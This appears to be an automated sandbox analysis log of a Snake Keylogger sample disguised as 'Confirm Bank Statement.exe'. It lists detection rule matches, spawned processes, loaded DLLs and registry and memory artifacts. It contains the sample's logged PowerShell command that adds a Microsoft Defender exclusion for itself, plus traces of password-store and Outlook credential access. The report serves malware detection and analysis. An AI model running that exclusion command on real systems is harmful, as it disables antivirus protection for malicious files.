                    Source: Process Memory Space: Confirm Bank Statement.exe PID: 5980, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Confirm Bank Statement.exe PID: 4244, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Confirm Bank Statement.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/6@3/3
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Confirm Bank Statement.exe.log
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvvfwxyg.1ed.ps1
                    Source: Confirm Bank Statement.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Confirm Bank Statement.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3721766715.00000000039BD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Confirm Bank Statement.exe Virustotal: Detection: 31%
                    Source: Confirm Bank Statement.exe ReversingLabs: Detection: 42%
                    Source: unknown Process created: C:\Users\user\Desktop\Confirm Bank Statement.exe "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Process created: C:\Users\user\Desktop\Confirm Bank Statement.exe "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Process created: C:\Users\user\Desktop\Confirm Bank Statement.exe "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: riched20.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: usp10.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: msls31.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: iconcodecservice.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Confirm Bank Statement.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Confirm Bank Statement.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Code function: 0_2_055BD508 push eax; mov dword ptr [esp], ecx 0_2_055BD51C
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Code function: 0_2_055BDFF0 push 08418B05h; ret 0_2_055BE003
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Code function: 0_2_07274236 push dword ptr [ebp+01h]; ret 0_2_0727423B
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Code function: 0_2_07286322 push 10418B05h; ret 0_2_07286333
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Code function: 4_2_00B52C6A push 00000071h; ret 4_2_00B52C75
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Code function: 4_2_00B5F273 push ebp; retf 4_2_00B5F281
                    Source: Confirm Bank Statement.exe Static PE information: section name: .text entropy: 7.627355501282747

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
